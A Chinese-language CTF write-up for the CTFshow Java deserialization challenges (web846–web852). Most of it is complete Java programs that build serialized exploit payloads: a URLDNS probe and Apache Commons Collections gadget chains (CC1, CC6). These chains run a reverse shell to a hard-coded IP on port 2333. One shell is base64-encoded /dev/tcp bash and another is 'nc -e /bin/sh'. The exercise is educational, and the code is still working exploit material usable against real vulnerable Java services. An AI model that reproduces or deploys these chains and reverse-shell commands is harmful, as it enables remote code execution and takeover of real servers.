CTFSHOW-java反序列化

web846

ctfshow会对你post提交的ctfshow参数进行base64解码
然后进行反序列化
构造出对当前题目地址的dns查询即可获得flag

package com.wea5e1;

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.Base64;
import java.util.HashMap;


public class ctfshow846 {
    public static void main(String[] args) throws Exception {
        HashMap h=new HashMap();
        URL url=new URL("https://b3f77a0b-169e-4e71-bf88-42040c3a87d7.challenge.ctf.show/");
        Class cls=Class.forName("java.net.URL");
        Field f = cls.getDeclaredField("hashCode");
        f.setAccessible(true);
        f.set(url,1);
        h.put(url,1);
        f.set(url,-1);

        ByteArrayOutputStream b = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(b);
        oos.writeObject(h);

        String payload = Base64.getEncoder().encodeToString(b.toByteArray());
        System.out.println(payload);
    }
}

然后url全编码就行了

web847

package org.example.CommonsCollections;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class show847 {
    public static void main(String[] args) throws Exception {

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                // 保留你的反弹 Shell 命令
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwMS4yMDEuMTE5LjE1OC8yMzMzIDA+JjE}|{base64,-d}|{bash,-i}"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> map = new HashMap<>();
        // 这里的 Key 必须是 "value"，因为 Target 注解里有 value() 方法
        map.put("value", "sometext");
        
        Map<Object, Object> transformedMap = TransformedMap.decorate(map, null, chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor AnnotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);
        AnnotationInvocationHandlerConstructor.setAccessible(true);
        
        Object o = AnnotationInvocationHandlerConstructor.newInstance(Target.class, transformedMap);
        
        ByteArrayOutputStream b = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(b);
        oos.writeObject(o);
        oos.close();

        String payload = Base64.getEncoder().encodeToString(b.toByteArray());
        System.out.println("Payload 生成成功:");
        System.out.println(payload);
    }
}

CC1的第一条链子直接打

web848

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class CommonsCollections11 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{
                        String.class,
                        Class[].class}, new Object[]{"getRuntime",
                        new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class,
                        Object[].class}, new Object[]{null, new Object[0]
                }),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{
                                "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwMS4yMDEuMTE5LjE1OC8yMzMzIDA+JjE}|{base64,-d}|{bash,-i}"}),
        };

        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();

        Map outerMap = LazyMap.decorate(innerMap, transformerChain);
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
        handler = (InvocationHandler) construct.newInstance(Retention.class, proxyMap);
        ByteArrayOutputStream b = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(b);
        oos.writeObject(handler);
        oos.close();

        String payload = Base64.getEncoder().encodeToString(b.toByteArray());
        System.out.println("Payload 生成成功:");
        System.out.println(payload);
        /*serialize(handler);
        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }*/
}}

使用的是CC1的另一个链子，反弹shell直接打

web849&web851&Web852

（本来看的851的因为会cc6,没想到打这个打通了）

package com.wea5e1;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;
import org.apache.commons.collections4.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class CC_six_4 {
    public static void main(String[] args) throws Exception{


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"nc 101.201.119.158 2333 -e /bin/sh"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> map = new HashMap<>();
        Map<Object, Object> Outermap = LazyMap.lazyMap(map, new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(Outermap, "test");

        HashMap<Object, Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry,"test1");
        Outermap.remove("test");

        Class c = LazyMap.class;
        Field factoryField = c.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(Outermap,chainedTransformer);

        ByteArrayOutputStream b = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(b);
        oos.writeObject(map2);

        String payload = Base64.getEncoder().encodeToString(b.toByteArray());
        System.out.println(payload);

    }
}

使用的是CC6的链子，反弹shell直接打，然后记得 commons-collections4.0 导入 org.apache.commons.collections4

其他的先埋个坑